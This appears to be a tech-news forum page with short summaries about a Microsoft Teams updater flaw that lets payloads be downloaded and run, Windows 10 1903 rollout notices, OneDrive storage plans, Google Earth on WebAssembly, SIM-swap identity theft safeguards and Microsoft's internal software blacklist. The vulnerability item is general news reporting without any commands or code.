By continuing to use the site or forum, you agree to the use of cookies, find out more by reading our GDPR policy

The update mechanism as it is currently implemented in Microsoft Teams desktop app allows downloading and executing arbitrary files on the system. The same issue affects GitHub, WhatsApp, and UiPath software for desktop computers but it can be used only to download a payload. These applications rely on the open source Squirrel project to manage installation and updating routines, which uses NuGet package manager to create the necessary files. Multiple security researchers discovered that using the 'update' command for a vulnerable application it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.' With Microsoft Teams, a payload is added to its folder and executed automatically using certain commands. These commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location.  The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts database on GitHub. Reverse engineer Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point as Microsoft informed the researcher that the fix would come in a future release of the software. Trying to replicate the effect with GitHub, and WhatsApp, and UiPath did not achieve execution for the payload and only downloading it from a remote server was possible. "In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer. If you use Microsoft Teams, you surely want to learn more about this security infraction and visit OUR FORUM.

Some Windows 10 users are seeing notifications from Microsoft that their devices are temporarily blocked from receiving the Windows 10 1903 update. There have been some bugs and issues with Microsoft's Windows 10 May Update/1903 feature update since Microsoft kicked off its rollout in late May. But the 1903 complaint I've gotten most often (so far) is from users who want to install the update but can't and don't know why. Microsoft has added a new notification which some users whose devices aren't ready or able to install the update are seeing when they attempt to proactively grab the 1903 release. As originally noted last week by Windows Latest, Microsoft has added a new message to its Windows Update page. Users attempting to install 1903 on machines with out-of-date drivers or other issues are seeing this message: "The Windows 10 May 2019 Update is on its way. We're offering this update to compatible devices, but your device isn't ready for it. Once your device is ready, you'll see the update available on this page. There's nothing you need to do at this time." I confirmed with Microsoft that this notification is part of its 1903 rollout strategy. "The notification started with the latest changes made to improve the quality/transparency of the Windows update process," according to a Microsoft spokesperson. Microsoft officials said in a blog post on May 21 that the company planned to start automatically updating devices running the April 2018 Update and earlier versions of Windows 10 to Windows 10 1903. Last week, via the Windows Update account on Twitter, Microsoft officials communicated that they were building and training machine-learning rollout processes that would enable this to happen. Details on exactly when and how Microsoft plans to do this are scarce. More information on the automatic-update plan is posted on OUR FORUM.

Office 365 consumer subscribers soon will be able to buy up to an extra 1TB of storage for a fee. And OneDrive web, mobile, and Windows 10 PC users are getting a new secure-storage feature for no additional charge. Microsoft is bringing a new storage plan and security options to the consumer version of its OneDrive cloud storage service. On June 25, Microsoft announced new paid OneDrive Personal plans for OneDrive consumer customers and Office 365 consumer subscribers; and its OneDrive Personal Vault feature. Microsoft is increasing the storage baseline for OneDrive Personal users who currently pay $1.99 a month for 50 GB of storage. Now, these users will get 100 GB of cloud storage for the same $1.99 a month fee. The extra storage will be added "soon" to those users accounts without them needing to take any action, officials said. Microsoft also finally is enabling Office 365 consumer subscribers to buy more OneDrive storage. As part of their current Office 365 Home or Personal subscriptions, users already get 1TB of OneDrive storage per user for no additional cost. These users are going to be able to buy more storage in 200 GB increments for $1.99 per month, up to 1TB of additional storage for $9.99 per month. The new total maximum of storage that Microsoft is making available is 2TB; there are currently no plans to offer more, said Seth Patton, General Manager of Microsoft 365. These new additional storage options will be made available worldwide "in the coming months," Patton said. For those who have multiple users with 1TB each under their Office 365 Home plan, only the primary account holder is eligible for the extra storage purchase. For more visit OUR FORUM.

Google Earth has been available on desktop for over two years now, and if you want to run the platform in a browser, you’ve to use Google’s Chrome. Other browsers including Chromium Edge and Opera aren’t supported because Google built Earth using Chrome-only technology. Google Earth is now available for all major web browsers, including [urlMicrosoft Edge and Firefox. Google created Earth web version using Portable Native Client (or PNaCl) and the original Edge or Chromium-based Edge does not ship with the Portable Native Client (PNaCl) component. Google has been working on WebAssembly-powered Google Earth and a version built using WebAssembly was demonstrated during the Chrome Dev Summit 2017. Google Earth has been finally rewritten in WebAssembly and the beta version now works on Microsoft Edge, Chromium web browsers and Firefox. The new version of Google Earth offers the same experience as the existing site. “Once the new version of Edge based on Chromium ships, apps in WebAssembly will work as well in Edge as they do in Chrome,” Google said in a blog post. While Google Earth works smoothly in new Edge, the platform is not fully supported in old Edge as the browser does not have Google Earth WebAssembly (WASM) Beta. Google Earth in old Edge renders the unsupported warning, but you can try to run it in multiple threaded or single threaded version, and it may work. We have more plus the link to try Google Earth posted on OUR FORUM.

Having your identity stolen can be a nightmare, and cleaning up the mess can take months. You can make life difficult for a would-be identity thief by locking down these five key aspects of your online life. What happened to my ZDNet colleague Matthew Miller this month is the stuff nightmares are made of. The title pretty much says it all: "SIM swap horror story: I've lost decades of data and Google won't lift a finger." In Matthew's case, hackers were able to convince T-Mobile to issue a replacement SIM that gave them access to his primary phone number. That, in turn, allowed them to reset passwords on his Gmail account, which pretty much gave them unfettered access to his entire identity. They then proceeded to shut down his Twitter account, wipe out everything associated with his Google account, and even access his online banking accounts. As I read Matthew's story, I had flashbacks to a similar incident that happened to Mat Honan back in 2012. Honan, who's now San Francisco Bureau Chief for Buzzfeed, documented his excruciating experience at the time in a memorable Wired article: "How Apple and Amazon Security Flaws Led to My Epic Hacking." The lesson from both of these horrifying experiences is that your primary phone number and your primary email address are far more valuable than you think. As our reliance upon online services grows, these two data points are extremely common means of authentication. If either one is compromised, an attacker can do bad things. And if those two factors are tied too closely together, it's game over for your online identity. You don't have to be the next victim. With a little effort (and, yes, a little expense), you can lock down the security of crucial online services. Follow these five guidelines and you can make life extremely difficult for a would-be identity thief. Fight hackers with 5 security safeguards we have posted on OUR FORUM.

Back in the day, Microsoft seemingly kept a long list of enemies otherwise known as competitors, as the company’s product portfolio grew in ambition. However, the days of vindictive and arguably petty Microsoft seem to be behind the company as it’s enemies list shrinks and its collaboration roster expands, yet, there are still a few areas in where the company keeps a healthy competitive nature and to that end, some software, services, and companies remain on a figurative and literal blacklist. According to a report from GeekWire, not only does Microsoft have a figurative blacklist, there is a literal blacklist of products that have been obtained and services from the following companies are frowned upon in internal use by the Redmond-based software company including obvious names such as Amazon Web Services and Kaspersky as well as a few head-scratchers in Grammarly and GitHub. Perhaps, the most noteworthy exclusions come from recent IPO darling Slack, to which Microsoft offers a competitor product in its Teams communication service. Unlike its more neutral stance on cross-platform usage and development, Microsoft seems to be taking an active roll in discouraging and even prohibiting the use of Slack by company employees.  We have some of this prohibited software posted on OUR FORUM.